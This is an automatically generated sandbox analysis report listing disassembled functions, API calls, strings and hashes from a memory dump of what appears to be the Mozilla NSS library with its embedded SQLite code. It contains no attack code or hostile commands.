Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB690AB
Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB690C9
Part of subcall function 6CB69090: EnterCriticalSection.KERNEL32 ref: 6CB690E5
Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB69116
Part of subcall function 6CB69090: LeaveCriticalSection.KERNEL32 ref: 6CB6913F

Part of subcall function 6CA90600: GetProcAddress.KERNEL32(?,?), ref: 6CA90623

_NSSUTIL_UTF8ToWide.NSS3(?), ref: 6CADC14F
PR_LoadLibraryWithFlags.NSS3 ref: 6CADC183
free.MOZGLUE(00000000), ref: 6CADC18E
PR_LoadLibrary.NSS3(?), ref: 6CADC1A3
PR_EnterMonitor.NSS3 ref: 6CADC1D4
PR_ExitMonitor.NSS3 ref: 6CADC1F3
PR_CallOnce.NSS3(6CC02318,6CADCA70), ref: 6CADC210
PR_EnterMonitor.NSS3 ref: 6CADC22B
PR_ExitMonitor.NSS3 ref: 6CADC247
PR_EnterMonitor.NSS3 ref: 6CADC26A
PR_ExitMonitor.NSS3 ref: 6CADC287
PR_UnloadLibrary.NSS3(?), ref: 6CADC2D0
PR_GetEnvSecure.NSS3(NSS_DEBUG_PKCS11_MODULE), ref: 6CADC392
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CADC3AB
PR_NewLogModule.NSS3(nss_mod_log), ref: 6CADC3D1
PR_GetEnvSecure.NSS3(NSS_FORCE_TOKEN_LOCK), ref: 6CADC782
PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD), ref: 6CADC7B5
PR_UnloadLibrary.NSS3(?), ref: 6CADC7CC
PR_SetError.NSS3(FFFFE097,00000000), ref: 6CADC82E
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CADC8BF
PORT_Alloc_Util.NSS3(?), ref: 6CADC8D5
free.MOZGLUE(00000000), ref: 6CADC900
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CADC9C7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CADC9E5
free.MOZGLUE(00000000), ref: 6CADCA5A

Strings

NSS_FORCE_TOKEN_LOCK, xrefs: 6CADC77D
FC_GetFunctionList, xrefs: 6CADC098
NSC_ModuleDBFunc, xrefs: 6CADC0FC
NSS_DEBUG_PKCS11_MODULE, xrefs: 6CADC38D
FC_GetInterface, xrefs: 6CADC054
NSS_DISABLE_UNLOAD, xrefs: 6CADC7B0
NSS_ReturnModuleSpecData, xrefs: 6CADC275
nss_mod_log, xrefs: 6CADC3CC
NSC_GetInterface, xrefs: 6CADC04F
Vendor NSS FIPS Interface, xrefs: 6CADC34A
NSC_GetFunctionList, xrefs: 6CADC093
PKCS 11, xrefs: 6CADC2F9, 6CADC314

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Monitor$Value$Enter$CriticalExitSection$Error$LeaveLibrary$Alloc_SecureUtilfree$ArenaLastLoadUnloadstrcmp$AddressCallFlagsModuleOnceProcR_snprintfTextWideWithmemcpystrlen
String ID: FC_GetFunctionList$FC_GetInterface$NSC_GetFunctionList$NSC_GetInterface$NSC_ModuleDBFunc$NSS_DEBUG_PKCS11_MODULE$NSS_DISABLE_UNLOAD$NSS_FORCE_TOKEN_LOCK$NSS_ReturnModuleSpecData$PKCS 11$Vendor NSS FIPS Interface$nss_mod_log
API String ID: 4243957313-3613044529
Opcode ID: 355a4cf40c2d46636ca50303f1c63818a0678d852965e47d28cadc86dff123d8
Instruction ID: a5bd1c9b26a448d0c0c2b3c974a7c4e33a2763d43581008542274704592e9716
Opcode Fuzzy Hash: 355a4cf40c2d46636ca50303f1c63818a0678d852965e47d28cadc86dff123d8
Instruction Fuzzy Hash: 95428EB1B002448FDF04DFA8D85AB9A7BB5FB45318F57402CD8059BB21E732E999CB91

Function 6CBB3FC0 Relevance: 70.5, APIs: 37, Strings: 3, Instructions: 485stringprocessCOMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000008), ref: 6CBB3FD5
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CBB3FFE
malloc.MOZGLUE(-00000003), ref: 6CBB4016
strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,6CBEFC62), ref: 6CBB404A
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6CBB407E
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6CBB40A4
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6CBB40D7
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CBB4112
malloc.MOZGLUE(00000000), ref: 6CBB411E
__p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 6CBB414D
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CBB4160
free.MOZGLUE(?), ref: 6CBB416C
malloc.MOZGLUE(?), ref: 6CBB41AB
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NSPR_INHERIT_FDS=,00000011), ref: 6CBB41EF
qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,00000004,6CBB4520), ref: 6CBB4244
GetEnvironmentStrings.KERNEL32 ref: 6CBB424D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBB4263
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBB4283
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBB42B7
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBB42E4
malloc.MOZGLUE(00000002), ref: 6CBB42FA
FreeEnvironmentStringsA.KERNEL32(?), ref: 6CBB4342
GetStdHandle.KERNEL32(000000F6), ref: 6CBB43AB
GetStdHandle.KERNEL32(000000F5), ref: 6CBB43B2
GetStdHandle.KERNEL32(000000F4), ref: 6CBB43B9
FreeEnvironmentStringsA.KERNEL32(?), ref: 6CBB4403
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CBB4410

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6CBB445E
CloseHandle.KERNEL32(?), ref: 6CBB446B
free.MOZGLUE(?), ref: 6CBB4482
free.MOZGLUE(00000000), ref: 6CBB4492
free.MOZGLUE(00000000), ref: 6CBB44A4
GetLastError.KERNEL32 ref: 6CBB44B2
PR_SetError.NSS3(FFFFE896,00000000), ref: 6CBB44BE
free.MOZGLUE(?), ref: 6CBB44C7
free.MOZGLUE(00000000), ref: 6CBB44D5
free.MOZGLUE(00000000), ref: 6CBB44EA

Strings

NSPR_INHERIT_FDS=, xrefs: 6CBB41E9
D, xrefs: 6CBB4396
=, xrefs: 6CBB44F8

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: free$Errormallocstrlen$Handle$EnvironmentStringsmemset$Free$CloseCreateLastProcessValue__p__environqsortstrncmpstrpbrk
String ID: =$D$NSPR_INHERIT_FDS=
API String ID: 3116300875-3553733109
Opcode ID: 32899512fd3e111fe69106e525b13a8f30ddc8c99b5f908b082568f6dd550dc8
Instruction ID: fdd0e2e12e54479c788f797a645d63665f5cecf11512f57b4e4f561d0a75690e
Opcode Fuzzy Hash: 32899512fd3e111fe69106e525b13a8f30ddc8c99b5f908b082568f6dd550dc8
Instruction Fuzzy Hash: 4702D470E042959FEB108F69C8447BEBBB4FF16308F244129D869B7B41DB71A855CF92

Function 6CAC6D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6CBCA8EC,0000006C), ref: 6CAC6DC6
memcpy.VCRUNTIME140(?,6CBCA958,0000006C), ref: 6CAC6DDB
memcpy.VCRUNTIME140(?,6CBCA9C4,00000078), ref: 6CAC6DF1
memcpy.VCRUNTIME140(?,6CBCAA3C,0000006C), ref: 6CAC6E06
memcpy.VCRUNTIME140(?,6CBCAAA8,00000060), ref: 6CAC6E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAC6E38

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6CAC6E76
TlsGetValue.KERNEL32 ref: 6CAC726F
EnterCriticalSection.KERNEL32(?), ref: 6CAC7283

Strings

!, xrefs: 6CAC7123

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: 7af2de500ec2273a9192fe5e612741666b87770f3b4fe476f2e5742e809e7074
Instruction ID: 6cb8e2639bd17d1004301d094622bf8954f94db8323a0a799765670678fb8d32
Opcode Fuzzy Hash: 7af2de500ec2273a9192fe5e612741666b87770f3b4fe476f2e5742e809e7074
Instruction Fuzzy Hash: AF728D75E052189FDF60DF28CC88B9ABBB5EB48304F1441A9D81DA7711EB319AC5CF91

Function 6CA33C40 Relevance: 41.2, APIs: 20, Strings: 3, Instructions: 932COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA33C66
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6CA33D04
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA33EAD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA33ED7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA33F74
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA34052
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA3406F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6CA3410D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA3449C

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA34452, 6CA34486, 6CA344EA, 6CA34571, 6CA34580, 6CA3458F, 6CA3475A, 6CA347FA
%s at line %d of [%.10s], xrefs: 6CA34495, 6CA344F9, 6CA3459E, 6CA34769, 6CA34809
database corruption, xrefs: 6CA34490, 6CA344F4, 6CA34599, 6CA34764, 6CA34804

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2597148001-598938438
Opcode ID: a506c4f58e5ea2b8fb0841cc14ee56ca5c31c1425010a02ecd212e951a47ec5d
Instruction ID: be6e485a3d391f5afaf1e5d30fbf7eed8e9515b3f38dd2478acc24e219664ecf
Opcode Fuzzy Hash: a506c4f58e5ea2b8fb0841cc14ee56ca5c31c1425010a02ecd212e951a47ec5d
Instruction Fuzzy Hash: 1982A474A04225CFCB04CF69C5A0B9DBBB1BF49318F295169D809EBB51D732EC86CB91

Function 6CB0AC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CB0ACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6CB0ACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6CB0ACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6CB0AD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CB0ADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB0ADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB0ADF0

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB0B06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB0B08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB0B1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB0B27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6CB0B2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB0B3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB0B40C

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: 5b6439f6ecca71d54b7f4ee3fbee201098b40b1fc5405e162fa84d71a5c4c4f6
Instruction ID: 7a9d739ec35126674374d30c876684f05462cfdb477b07676b53fd78352f5c6b
Opcode Fuzzy Hash: 5b6439f6ecca71d54b7f4ee3fbee201098b40b1fc5405e162fa84d71a5c4c4f6
Instruction Fuzzy Hash: 7422AE71A04341AFE710CF14CC40B9A7BE5EF8430CF24896CE9585B7A2E772E859CB96

Function 6CA51F90 Relevance: 35.9, APIs: 5, Strings: 18, Instructions: 1430COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CA525F3

Strings

unsafe use of virtual table "%s", xrefs: 6CA530D1
%s.%s.%s, xrefs: 6CA5302D
access to view "%s" prohibited, xrefs: 6CA52F4A
too many references to "%s": max 65535, xrefs: 6CA52FB6
cannot join using column %s - column not present in both tables, xrefs: 6CA532AB
cannot have both ON and USING clauses in the same join, xrefs: 6CA532B5
multiple recursive references: %s, xrefs: 6CA522E0
%s.%s, xrefs: 6CA52D68
H, xrefs: 6CA5329F
recursive reference in a subquery: %s, xrefs: 6CA522E5
no such index: "%s", xrefs: 6CA5319D
no such table: %s, xrefs: 6CA526AC
table %s has %d values for %d columns, xrefs: 6CA5316C
no tables specified, xrefs: 6CA526BE
'%s' is not a function, xrefs: 6CA52FD2
a NATURAL join may not have an ON or USING clause, xrefs: 6CA532C1
too many columns in result set, xrefs: 6CA53012
H, xrefs: 6CA5322D

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: memcpy
String ID: %s.%s$%s.%s.%s$'%s' is not a function$H$H$a NATURAL join may not have an ON or USING clause$access to view "%s" prohibited$cannot have both ON and USING clauses in the same join$cannot join using column %s - column not present in both tables$multiple recursive references: %s$no such index: "%s"$no such table: %s$no tables specified$recursive reference in a subquery: %s$table %s has %d values for %d columns$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
API String ID: 3510742995-3400015513
Opcode ID: d822d5cc9e5d42b5c13043c5944dcf22e47db5dec6f5a5c4b3794e7bdf61168c
Instruction ID: 05b1500dfd758e555adacbd97ae70bcc9092d6a528de836cb72339295e295153
Opcode Fuzzy Hash: d822d5cc9e5d42b5c13043c5944dcf22e47db5dec6f5a5c4b3794e7bdf61168c
Instruction Fuzzy Hash: 24D2AE74E05209CFDB04CF99C484B9DB7B1FF89308F68C269D855ABB51D731A8A6CB90

Function 6CA8ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CA8ED38

Part of subcall function 6CA24F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA24FC4

sqlite3_mprintf.NSS3(snippet), ref: 6CA8EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6CA8EFE4

Part of subcall function 6CB4DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6CA25001,?,00000003,00000000), ref: 6CB4DFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6CA8F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6CA8F129
sqlite3_mprintf.NSS3(optimize), ref: 6CA8F1D1
sqlite3_free.NSS3(?), ref: 6CA8F368

Strings

unicode61, xrefs: 6CA8EDB5
fts3tokenize, xrefs: 6CA8F30F
offsets, xrefs: 6CA8EFAF, 6CA8EFDF, 6CA8F01F
fts4aux, xrefs: 6CA8ECF9
matchinfo, xrefs: 6CA8F04F, 6CA8F082, 6CA8F0C2, 6CA8F0F2, 6CA8F124, 6CA8F169
fts3_tokenizer, xrefs: 6CA8EE1A, 6CA8EEA8
simple, xrefs: 6CA8ED79
snippet, xrefs: 6CA8EF05, 6CA8EF37, 6CA8EF7C
optimize, xrefs: 6CA8F199, 6CA8F1CC, 6CA8F211
porter, xrefs: 6CA8ED97
fts4, xrefs: 6CA8F2AD
fts3, xrefs: 6CA8F247

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: 889dac1b6d4c39dfaa9c9f79f55ec10f99bd06d851d17c118ed1b4f99b265542
Instruction ID: e68182bde5868974699b48d0736e41950031c3a312d1811714cc0a1392089acb
Opcode Fuzzy Hash: 889dac1b6d4c39dfaa9c9f79f55ec10f99bd06d851d17c118ed1b4f99b265542
Instruction Fuzzy Hash: 3702F4B5B053428BE7049F31AC8573B36B6BBC570CF18453CD86997B01EB75E88A8792

Function 6CB07C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB07C33
NSS_OptionGet.NSS3(0000000C,00000000), ref: 6CB07C66
CERT_DestroyCertificate.NSS3(00000000), ref: 6CB07D1E

Part of subcall function 6CB07870: SECOID_FindOID_Util.NSS3(?,?,?,6CB091C5), ref: 6CB0788F

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB07D48
PR_SetError.NSS3(FFFFE067,00000000), ref: 6CB07D71
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CB07DD3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB07DE1
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB07DF8
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CB07E1A
PR_SetError.NSS3(FFFFE067,00000000), ref: 6CB07E58

Part of subcall function 6CB07870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CB091C5), ref: 6CB078BB
Part of subcall function 6CB07870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6CB091C5), ref: 6CB078FA
Part of subcall function 6CB07870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6CB091C5), ref: 6CB07930
Part of subcall function 6CB07870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CB091C5), ref: 6CB07951
Part of subcall function 6CB07870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB07964
Part of subcall function 6CB07870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CB0797A
Part of subcall function 6CB07870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6CB07988
Part of subcall function 6CB07870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6CB07998
Part of subcall function 6CB07870: free.MOZGLUE(00000000), ref: 6CB079A7
Part of subcall function 6CB07870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6CB091C5), ref: 6CB079BB
Part of subcall function 6CB07870: PR_GetCurrentThread.NSS3(?,?,?,?,6CB091C5), ref: 6CB079CA

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB07E49
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB07F8C
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CB07F98
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB07FBF
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB07FD9
PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6CB08038
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CB08050
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CB08093
SECOID_FindOID_Util.NSS3 ref: 6CB07F29

Part of subcall function 6CB007B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CAA8298,?,?,?,6CA9FCE5,?), ref: 6CB007BF
Part of subcall function 6CB007B0: PL_HashTableLookup.NSS3(?,?), ref: 6CB007E6
Part of subcall function 6CB007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB0081B
Part of subcall function 6CB007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB00825

SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CB08072
SECOID_FindOID_Util.NSS3 ref: 6CB080F5

Part of subcall function 6CB0BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6CB0800A,00000000,?,00000000,?), ref: 6CB0BC3F

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
String ID:
API String ID: 2815116071-0
Opcode ID: 3e14e5330746b7da97c2ef27fe1eb583edc74059cee5e75813c1f6c752fc4c0d
Instruction ID: 1690c997470bbb18a987faca567a282225f784ce693bf3260af0c9b6391067b6
Opcode Fuzzy Hash: 3e14e5330746b7da97c2ef27fe1eb583edc74059cee5e75813c1f6c752fc4c0d
Instruction Fuzzy Hash: C4E1A0707093809FD710CF28D840B5ABBE5EF44308F144A6DE88AABB51E772ED49CB52

Function 6CA91C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6CA91C6B
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6CA91C75
GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6CA91CA1
GetLengthSid.ADVAPI32(?), ref: 6CA91CA9
malloc.MOZGLUE(00000000), ref: 6CA91CB4
CopySid.ADVAPI32(00000000,00000000,?), ref: 6CA91CCC
GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6CA91CE4
GetLengthSid.ADVAPI32(?), ref: 6CA91CEC
malloc.MOZGLUE(00000000), ref: 6CA91CFD
CopySid.ADVAPI32(00000000,00000000,?), ref: 6CA91D0F
CloseHandle.KERNEL32(?), ref: 6CA91D17
AllocateAndInitializeSid.ADVAPI32 ref: 6CA91D4D
GetLastError.KERNEL32 ref: 6CA91D73
PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6CA91D7F

Strings

_PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6CA91D7A
